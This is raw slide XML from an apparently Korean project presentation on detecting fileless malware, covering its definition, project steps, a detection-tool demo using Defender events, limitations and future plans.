            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="3984645"/>
            <a:ext cx="3944182" cy="1998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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="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Load Defender Event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>저장된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>defender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" lvl="0" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  이벤트를 불러옴</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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71D545-982C-4D22-9D38-1A38E9F550B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010653" y="1441822"/>
            <a:ext cx="3944182" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Where Is Wally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A83394-B6B5-4DCC-8C3E-446910DCA8C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260684" y="2647391"/>
            <a:ext cx="3908087" cy="640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7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altLang="ko-KR" sz="2400" b="1" kern="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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" kern="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시연 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="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Defender Event]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="KakaoTalk_20201122_222654551">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F78A0F-1041-4A91-BE30-8EFF319B80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01688" y="0"/>
            <a:ext cx="14286312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4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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>한계점 및 향후계획</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="순서도: 수행의 시작/종료 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{682F4C3E-60F9-4F3F-A512-B8BE4000AE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006642" y="6051507"/>
            <a:ext cx="2509813" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>향후계획</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white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에스코어 드림 4 Regular"/>
              <a:ea typeface="에스코어 드림 4 Regular"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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15FD7573-F903-425B-B9DB-E66A3D552135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006642" y="2476500"/>
            <a:ext cx="2509813" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>한계점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="white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에스코어 드림 4 Regular"/>
              <a:ea typeface="에스코어 드림 4 Regular"/>
              <a:cs typeface="Calibri"/>
              <a:sym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8F5ABE-B7FE-4251-9717-30F11236BF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3534498"/>
            <a:ext cx="14838636" cy="1515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just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>정상과 비정상 행위의 차이에 대한 경계가 모호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>하여 탐지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>을 작성하는데 어려움</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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ko-KR" sz="2800" b="1" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 악성코드 샘플과 시간의 한계</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="28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DDE621-36CE-447E-B661-87BE08C0D280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="6946437"/>
            <a:ext cx="14838636" cy="1515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just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>악성코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>intelligence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>를 수집 및 탐지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>확장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>보완</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F497D"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-457200" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="17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2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>많은 데이터를 서버에서 처리할 수 있도록 서버 구상 및 개발</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" b="1" kern="0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302970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9128" y="34809"/>
            <a:ext cx="18304842" cy="10300060"/>
            <a:chOff x="-9564" y="-7173"/>
            <a:chExt cx="18304842" cy="103000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564" y="-7173"/>
              <a:ext cx="18304842" cy="10300060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324315" y="3356917"/>
            <a:ext cx="12077486" cy="219423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2800" kern="0" spc="-300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:cs typeface="THE로동신문" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thank you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27097" y="6012211"/>
            <a:ext cx="8574504" cy="116002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400" kern="0" spc="-100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular" panose="020B0503030302020204" pitchFamily="34" charset="-127"/>
                <a:cs typeface="에스코어 드림 4" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>감사합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular" panose="020B0503030302020204" pitchFamily="34" charset="-127"/>
                <a:cs typeface="에스코어 드림 4" pitchFamily="34" charset="0"/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5A0762D-7BDB-4747-8237-2F63B3D9B7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828799" y="7048499"/>
            <a:ext cx="15079580" cy="22077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사이버 공격 중 파일리스 그래프 추이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704227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 찾아서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D304C850-7966-4BD4-AD41-5B96B4347D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3412387"/>
            <a:ext cx="15849600" cy="432191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endParaRPr lang="en-US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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497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파일의 형태로 들어오지 않는 위협</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497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(Microsoft)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US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악의적인 기능을 수행하는 코드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497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메모리에서만 실행시키면서 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F497D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시스템에 피해를 입히는 유형의 공격 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-US" altLang="ko-KR" sz="2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AhnLab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algn="ctr"/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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497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파일이 없어 흔적을 찾기 어려움</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F497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-US" altLang="ko-KR" sz="2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pmg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지식엔진연구소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E21C2F-13CA-4E27-9247-97822C586132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="2636350"/>
            <a:ext cx="8229600" cy="7620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Fileless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Malware &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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Fileless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C74E49-7AF7-4A79-98F0-75388BD433D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431625" y="7589773"/>
            <a:ext cx="5791200" cy="828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 err="1">
                <a:solidFill>
                  <a:srgbClr val="F9485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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F9485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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F9485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공격 기법은 증가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="28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하는 추세 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929E6E5-73C8-4845-ACFC-859D83ED9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7292846"/>
            <a:ext cx="7315201" cy="5938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D668AD3-FED8-432D-949E-210EE00F71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7715" y="8292218"/>
            <a:ext cx="7351486" cy="6432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5542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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 찾아서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127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7E6662C1-A69D-4646-ABE6-D0AEB44B421D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668132" y="2727507"/>
            <a:ext cx="3370468" cy="57616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3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프로젝트 목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="32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6E81BE31-F49E-4960-B062-6BEA9C9A7FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668132" y="5707524"/>
            <a:ext cx="16764000" cy="14478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3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프로젝트 진행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="32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96917A4-3DAF-4487-8F88-02C5B3E4C80F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743856" y="6637616"/>
            <a:ext cx="3048000" cy="21336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1A30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400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>악성코드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>자료 습득</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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0D723CC-C644-4AAA-881D-898B31F17A72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5480570" y="6637616"/>
            <a:ext cx="3048000" cy="21336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1A30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400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>악성코드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>분석 대상</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 선정 및 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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A6DCFBB-13C1-4F30-82C4-EB8A19CA304E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9217284" y="6637616"/>
            <a:ext cx="3048000" cy="21336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1A30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400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>악성코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>탐지 근거 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>작성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8A8A4D2-5C2F-43F9-B261-B54869DF15E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12954000" y="6637616"/>
            <a:ext cx="3048000" cy="21336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1A30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400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>악성코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>탐지 툴 개발 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기획 및 구현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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CAFE2960-940A-47BB-AFF9-B252BBCE71D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
